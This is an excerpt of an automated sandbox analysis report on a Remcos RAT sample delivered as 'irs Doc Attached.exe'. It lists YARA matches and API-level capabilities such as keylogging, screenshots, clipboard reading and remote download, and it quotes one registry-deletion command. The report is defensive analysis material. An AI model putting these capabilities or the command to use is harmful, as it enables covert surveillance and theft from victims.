Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D1E8
Contains functionality to read the clipboard dataShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D1E8
Contains functionality to record screenshotsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040F460 Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040F460
Potential key logger detected (key state polling based)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00405221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,2_2_00405221
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00185221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,16_2_00185221

E-Banking Fraud:

barindex
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 3740, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 660, type: MEMORY
Source: Yara matchFile source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionalty to change the wallpaperShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10544943 SystemParametersInfoW,2_2_10544943

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
Source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
Contains functionality to call native functionsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10545184 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,2_2_10545184
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D1E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1053F905 atoi,atoi,atoi,ExitWindowsEx,LoadLibraryA,GetProcAddress,2_2_1053F905
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0018D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai16_2_0018D1E8
Detected potential crypto functionShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040D1E82_2_0040D1E8
Source: C:\Users\Public\Kaphpos.exeCode function: 15_3_0230265815_3_02302658
Source: C:\Users\Public\Kaphpos.exeCode function: 15_3_0230265815_3_02302658
Source: C:\Users\Public\Kaphpos.exeCode function: 15_3_0230265815_3_02302658
Source: C:\Users\Public\Kaphpos.exeCode function: 15_3_0230265815_3_02302658
Source: C:\Users\Public\Kaphpos.exeCode function: 15_3_0230265815_3_02302658
Source: C:\Users\Public\Kaphpos.exeCode function: 15_3_0230265815_3_02302658
Source: C:\Users\Public\Kaphpos.exeCode function: 15_3_0230265815_3_02302658
Source: C:\Users\Public\Kaphpos.exeCode function: 15_3_0230265815_3_02302658
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0018D1E816_2_0018D1E8
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\Public\Kaphpos.exeCode function: String function: 02300277 appears 56 times
Source: C:\Users\Public\Kaphpos.exeCode function: String function: 022FE2AC appears 64 times
Source: C:\Users\Public\Kaphpos.exeCode function: String function: 02306A14 appears 48 times
Source: C:\Users\Public\Kaphpos.exeCode function: String function: 022FC254 appears 36 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 00413956 appears 47 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 00193956 appears 47 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 105453B6 appears 47 times
PE file contains strange resourcesShow sources
Source: irs Doc Attached.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Kaphpos.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Uses reg.exe to modify the Windows registryShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Yara signature matchShow sources
Source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.1133899686.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.1130970018.0000000000180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000002.00000002.1152182250.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000002.00000002.1156149653.0000000010530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
